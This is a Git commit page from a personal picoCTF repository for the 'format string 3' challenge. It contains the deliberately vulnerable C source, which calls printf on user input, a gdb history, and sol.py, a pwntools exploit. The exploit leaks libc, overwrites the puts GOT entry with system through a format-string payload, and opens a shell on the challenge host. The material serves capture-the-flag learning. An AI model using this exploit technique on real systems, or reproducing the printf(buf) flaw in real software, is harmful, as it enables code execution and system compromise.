theon-1/picoCTF
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

format string 3

Browse Source
This commit is contained in:
Maxime Vorwerk
2024-11-04 09:31:53 +01:00
parent b4bd094d7e
commit b67f48744b
9 changed files with 160 additions and 2 deletions
Download Patch File Download Diff File Expand all files Collapse all files

2
format_string_2/peda-session-vuln.txt
View File

@@ -1,2 +0,0 @@
break *main+95

89
format_string_3/.gdb_history Normal file
View File

@@ -0,0 +1,89 @@
exit
exit
exit
run
exit
disassemble main
b *main+16
b *main+160
rm
b
b --info
help b
help breakpoints
exit
disassemble main
b *main+160
run
continue
continue < payload
run < payload
continue
con
cont
contin
run < payload
continue
disassemble main
b *main+175
run < payload
continue
continue
got
disassemble 0x404018
x 0x404018
x/8 0x404018
x/8w 0x404018
x/8w2 0x404018
x/8x2 0x404018
x/8x2 0x404018
x/8x2 0x404018
x/16 0x404018
run < payload
disassemble 0x404018
continue
disassemble 0x404018
x/16 0x404018
x *setvbuf
search
search --0xfa1e0ff3
search --pointer 0xda1e0ff3
x *puts
search --pointer 0x7ffff7e5a3f0
search --pointer 0x7ffff7e9bf0
search --pointer 0x7ffff7e59bf0
disassemble main
x 0x404018
plt
got
run < payload
continue
run
x *puts
x setvbuf
search --pointer 0x7ffff7e59bf0
x 0x404018
x/2 0x404018
x/w 0x404018
x/d 0x404018
x/b 0x404018
x/g 0x404018
x/a 0x404018
set {int}0x404018 = 0x7ffffe5a3f0
x/a 0x404018
continue
continue
disassemble main
x/2d x04012f2
run
x/2d x04012f2
x/2a x04012f2
x/2a 0x04012f2
x/4a 0x04012f2
continue
continue
run
got
got
exit

BIN
format_string_3/format-string-3 Executable file
View File

Binary file not shown.

31
format_string_3/format-string-3.c Normal file
View File

@@ -0,0 +1,31 @@
#include <stdio.h>
#define MAX_STRINGS 32
char *normal_string = "/bin/sh";
void setup() {
setvbuf(stdin, NULL, _IONBF, 0);
setvbuf(stdout, NULL, _IONBF, 0);
setvbuf(stderr, NULL, _IONBF, 0);
}
void hello() {
puts("Howdy gamers!");
printf("Okay I'll be nice. Here's the address of setvbuf in libc: %p\n", &setvbuf);
}
int main() {
char *all_strings[MAX_STRINGS] = {NULL};
char buf[1024] = {'\0'};
setup();
hello();
fgets(buf, 1024, stdin);
printf(buf);
puts(normal_string);
return 0;
}

BIN
format_string_3/format-string-3_patched Executable file
View File

Binary file not shown.

BIN
format_string_3/ld-linux-x86-64.so.2 Executable file
View File

Binary file not shown.

BIN
format_string_3/libc.so.6 Normal file
View File

Binary file not shown.

BIN
format_string_3/payload Normal file
View File

Binary file not shown.

40
format_string_3/sol.py Executable file
View File

@@ -0,0 +1,40 @@
#!/usr/bin/env python3
from pwn import *
context.arch = "amd64"
elf = ELF("libc.so.6")
#conn = process(["./format-string-3_patched"])
address = "rhea.picoctf.net"
port = 65145
conn = remote(address, port)
conn.recvuntil(b"libc: ")
setvbuf_base = int(conn.recvline(), 16)
log.info(f"setvbuf base: {hex(setvbuf_base)}")
libc_base = setvbuf_base - elf.symbols["setvbuf"]
log.info(f"libc base: {hex(libc_base)}")
system_base = libc_base + elf.symbols["system"]
log.info(f"evecve base: {hex(system_base)}")
def discover_offset(payload):
log.debug(payload)
#c = process(["./format-string-3_patched"])
c = remote(address, port)
c.recvlines(2)
c.sendline(payload)
res = c.recvall()
log.debug(res)
return res
fmt = FmtStr(discover_offset)
offset = fmt.offset
payload = fmtstr_payload(offset, {0x404018: system_base})
with open("payload", "wb") as f:
f.write(payload)
f.close()
conn.sendline(payload)
conn.interactive()